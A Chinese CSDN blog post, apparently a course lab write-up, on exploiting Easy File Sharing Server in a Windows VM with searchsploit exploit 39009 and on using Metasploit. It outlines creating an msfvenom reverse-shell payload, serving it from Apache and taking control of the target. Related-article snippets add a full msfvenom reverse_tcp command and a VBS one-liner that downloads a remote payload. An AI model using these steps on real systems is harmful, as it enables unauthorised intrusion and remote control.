网络渗透测试复现任务

最新推荐文章于 2023-03-23 14:10:01 发布
最新推荐文章于 2023-03-23 14:10:01 发布
阅读量650 收藏
点赞数
文章标签: 测试工具 网络 wireshark python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73936732/article/details/127986829
版权

一、漏洞渗透测试

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100

先使用nmap指令扫出靶机IP192.168.79.132,然后 nmap -sV -A -o easy-file.txt ip 扫描一下,发现虚拟机已经运行了 文件easy file sharing server

使用命令:searchsploit easy file sharing得到以下画面

3、利用该漏洞,使得靶机运行计算器。P116-119

选择 39009的脚本,再次使用命令:searchsploit -m 39009

然后利用python +文件位置 + IP + 8000端口

最后Windows虚拟机上面打开了一个计算器

二、Metasploit应用

1、生成主控端、被控端。

首先输入msfconsole启动Metasploit,使用handler作为主控端

然后使用use exploit/multi/handler

还有分别建立 payload  lhost  lport

2、获得靶机(Windows)控制权。

ls查看当前目录

cd进入某个路径

msfvenom –p生成payload.exe

找到payload.exe

cp其到www/html/0.exe

放到网上

service apache2 start打开服务

service apache2 status查看状态

run运行网站

3、下载靶机上任意一个文件。

靶机输入主控机ip + /0.exe下载端口0

运行0端口,在桌面下载233.txt.txt

主控机之前还处于靶机桌面路径,直接下载文件到默认root文件即可

早起的鸟儿不吃
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络渗透测试复现任务(1).pdf
11-07
网络渗透测试复现任务(1).pdf
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2209
windows payload 反弹shell
Windows提权
赤赤三的博客
03-20 1047
Windows密码安全性测试: 本地管理员密码如何直接提取(能读取就直接读取,不能读取使用hash连接,实在不行就暴力破解): 直接通过mimikatz读取管理员密码: 使用Ophcrack破解系统Hash密码:https://ophcrack.sourceforge.io/tables.php 把这两个目录导入到kali自带工具里: 通过lazagne工具提取密码: 读取本地计算机所有密码 ...
Kali2虚拟机中工具Metasploit的简单应用
qq_55857040的博客
12-13 4293
实验环境 攻击机:Kali-Linux-2021.2-vmware-amd64 靶机:Win2003 旗舰版 实验过程 一、利用metasploit生成被控端 打开kali窗口,输入命令(注意空格符,复现过程惨痛代价) sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机的ip地址 lport=5000 -f exe -o /root/payload.exe 这样就是生成成功了 远程控制程序payload.exe(...
easy file sharing server漏洞渗透测试及Metasploit应用
zzzfff__的博客
11-06 399
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。
复现任务A(漏洞渗透测试与Metasploit应用)
qq_61793472的博客
11-20 376
网络渗透测试课,复现任务A
使用numpy复现贝叶斯网络
10-16
适合学习机器学习算法入门 学习numpy开发机器学习算法
keras复现场景文本检测网络CPTN项目源码
10-13
keras复现场景文本检测网络CPTN项目源码 效果: ​ 使用ICDAR2015的1000张图像训练在500张测试集上结果为:Recall: 37.07 % Precision: 42.94 % Hmean: 39.79 %; 原文中的F值为61%;使用了额外的3000张图像训练。 ...
采用matlab复现深度网络
最新发布
04-09
采用matlab复现深度网络
采用matlab复现深度网络.rar
07-18
深度学习仍然是神经网络的延伸,之前(人工神经网络之纯matlab实现1-3)大部分内容都是适用的。深度学习是一种使用深度神经网络的机器学习技术。如你所知,深层神经网络是包含两个或更多隐藏层的多层神经网络。这就是...
简单漏洞复现_网络渗透测试
Radiency的博客
11-23 1517
利用easy file sharing server服务漏洞;远程控制目标,生成主控端、被控端,获得靶机控制权。
复现任务A
m0_65354386的博客
11-17 227
靶机(Windows)漏洞渗透测试及Metasploit应用
漏洞复现A
weixin_51561328的博客
11-21 3732
一、漏洞渗透测试 1、靶机安装easy file sharing server(efssetup_2018.zip) 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100 3、利用该漏洞,使得靶机运行计算器。P116-119
内网payload下载及免杀文档制作
Amire0x的小乐园
11-30 644
payload下载及免杀文档制作 payload下载 vbs 脚本如下,注意要放到一行里 支持windows全系列,但对https不友好 echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile w
漏洞渗透测试复现 easy file sharing server
m0_62659165的博客
11-22 688
漏洞渗透测试复现 easy file sharing server
网络渗透测试漏洞复现任务
m0_64229840的博客
11-21 430
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100。3、利用该漏洞,使得靶机运行计算器。P116-119
VMware Tools本地提权漏洞CVE-2022-31676分析与复现
Button12138的博客
01-31 888
VMware Tools本地提权漏洞CVE-2022-31676分析与复现
【漏洞复现】Weblogic CVE-2023-21839
zg_111的博客
03-23 6252
Weblogic CVE-2023-21839漏洞复现
网络安全漏洞复现kali
08-16
例如,如果你想复现Web应用程序的漏洞,可以使用Burp Suite或OWASP ZAP来进行渗透测试。 4. 设置实验环境:在复现漏洞之前,建议你在虚拟环境中设置一个实验环境。你可以使用虚拟机软件(如VirtualBox)创建一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值